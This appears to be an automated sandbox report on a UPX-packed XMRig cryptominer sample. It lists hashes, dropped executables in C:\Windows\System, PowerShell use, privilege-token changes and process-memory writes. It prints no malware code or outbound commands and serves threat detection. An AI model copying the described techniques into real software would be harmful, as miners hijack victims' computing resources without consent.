Malware Analysis Report

2024-11-16 11:36

Sample ID 240612-jm1gnsvekp
Target 292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe
SHA256 1095b1ed727f7ef3074672e2e7b18f68139f32c713b2fb988ef4a85625e050f2
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1095b1ed727f7ef3074672e2e7b18f68139f32c713b2fb988ef4a85625e050f2

Threat Level: Known bad

The file 292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

XMRig Miner payload

xmrig

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 07:47

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 07:47

Reported

2024-06-12 07:50

Platform

win7-20240508-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\DZrKkAd.exe N/A
N/A N/A C:\Windows\System\QNqTcCI.exe N/A
N/A N/A C:\Windows\System\JuSnDLj.exe N/A
N/A N/A C:\Windows\System\YIipYkp.exe N/A
N/A N/A C:\Windows\System\eCXrNnn.exe N/A
N/A N/A C:\Windows\System\nwhzArH.exe N/A
N/A N/A C:\Windows\System\AuVxoGG.exe N/A
N/A N/A C:\Windows\System\OafXktD.exe N/A
N/A N/A C:\Windows\System\heysZsU.exe N/A
N/A N/A C:\Windows\System\SRlwNSr.exe N/A
N/A N/A C:\Windows\System\GZEAeoJ.exe N/A
N/A N/A C:\Windows\System\VRgIbfp.exe N/A
N/A N/A C:\Windows\System\oFqPQyK.exe N/A
N/A N/A C:\Windows\System\JbCstti.exe N/A
N/A N/A C:\Windows\System\KJiXiIS.exe N/A
N/A N/A C:\Windows\System\QNbfdYp.exe N/A
N/A N/A C:\Windows\System\AhAIcat.exe N/A
N/A N/A C:\Windows\System\UOAriZO.exe N/A
N/A N/A C:\Windows\System\pubthri.exe N/A
N/A N/A C:\Windows\System\QCKnUPl.exe N/A
N/A N/A C:\Windows\System\XCBqqjh.exe N/A
N/A N/A C:\Windows\System\DyIbAXX.exe N/A
N/A N/A C:\Windows\System\lbVdRxA.exe N/A
N/A N/A C:\Windows\System\labQVpR.exe N/A
N/A N/A C:\Windows\System\dqhsYFV.exe N/A
N/A N/A C:\Windows\System\WxqJLut.exe N/A
N/A N/A C:\Windows\System\wKWjoZl.exe N/A
N/A N/A C:\Windows\System\LlqgRTd.exe N/A
N/A N/A C:\Windows\System\AlqyhVN.exe N/A
N/A N/A C:\Windows\System\TQAkVdR.exe N/A
N/A N/A C:\Windows\System\cvgkOgm.exe N/A
N/A N/A C:\Windows\System\eWpZtqO.exe N/A
N/A N/A C:\Windows\System\zoCoJvL.exe N/A
N/A N/A C:\Windows\System\lXkmKnX.exe N/A
N/A N/A C:\Windows\System\SptAkAs.exe N/A
N/A N/A C:\Windows\System\iiOSRlt.exe N/A
N/A N/A C:\Windows\System\lZpXcky.exe N/A
N/A N/A C:\Windows\System\lCsIxlX.exe N/A
N/A N/A C:\Windows\System\HmScMmD.exe N/A
N/A N/A C:\Windows\System\zmLvtDW.exe N/A
N/A N/A C:\Windows\System\tngCnho.exe N/A
N/A N/A C:\Windows\System\NgPcNDV.exe N/A
N/A N/A C:\Windows\System\wXHUnoW.exe N/A
N/A N/A C:\Windows\System\sYDpZYp.exe N/A
N/A N/A C:\Windows\System\DBAKqno.exe N/A
N/A N/A C:\Windows\System\phHFcgd.exe N/A
N/A N/A C:\Windows\System\NhTFnRY.exe N/A
N/A N/A C:\Windows\System\ZhBqOsc.exe N/A
N/A N/A C:\Windows\System\ndLtcjy.exe N/A
N/A N/A C:\Windows\System\EWPHhww.exe N/A
N/A N/A C:\Windows\System\yPGcQnP.exe N/A
N/A N/A C:\Windows\System\JlzsNLl.exe N/A
N/A N/A C:\Windows\System\FIaFhGC.exe N/A
N/A N/A C:\Windows\System\fqcXtqm.exe N/A
N/A N/A C:\Windows\System\rjCRxQp.exe N/A
N/A N/A C:\Windows\System\PXztiuN.exe N/A
N/A N/A C:\Windows\System\dFBnJHh.exe N/A
N/A N/A C:\Windows\System\IZWjGJt.exe N/A
N/A N/A C:\Windows\System\AOzYknH.exe N/A
N/A N/A C:\Windows\System\PxrxJuj.exe N/A
N/A N/A C:\Windows\System\TSTCMLu.exe N/A
N/A N/A C:\Windows\System\lGFCcQY.exe N/A
N/A N/A C:\Windows\System\GQVRKro.exe N/A
N/A N/A C:\Windows\System\OyWCeiz.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\AvvkZPN.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CtmdkTM.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YKRZXbj.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GHaYHQD.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IqjBfXc.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sZycsfy.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dRIIXzK.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GMZNzzA.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vgngufj.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KgKZgWT.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cmUTSQn.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zOxRiGP.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xRTkSNj.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kpfzEgs.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cSrZvcR.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XWptYdP.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wDrLedr.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qqarOcl.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QcagaCq.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GQbBeoh.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hPEMgkH.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nzJLpns.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kEMXyhh.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MiwGEnn.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ubHyriE.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TOSIPfv.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VDnJtvH.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pqDsvFd.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QoOpDyo.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CTCiyYX.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JulScXc.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SJNexQz.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rTmgwzT.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QqxANHv.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lkEfByZ.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GfJkAjn.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xETjWif.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JpmpGrJ.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TuVAFKp.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UoJJOTn.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cJPOhJa.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZcEZWBu.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KRRdtXq.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\keYGQeL.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\txMKBbb.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IJLTvbV.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wtIHzIj.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JCcOsvO.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VIHyltr.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TZrBfsU.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BNkjJPk.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gexJwVe.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qYgllwA.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zxVcipp.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lcPDyhb.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lbVdRxA.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GHoawBX.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KxIMsEf.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TgRermv.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sxflYWc.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SAWRvQt.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rlqUIgc.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wwqrHSS.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eZMCfsb.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2084 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2084 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2084 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\DZrKkAd.exe
PID 2084 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\DZrKkAd.exe
PID 2084 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\DZrKkAd.exe
PID 2084 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QNqTcCI.exe
PID 2084 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QNqTcCI.exe
PID 2084 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QNqTcCI.exe
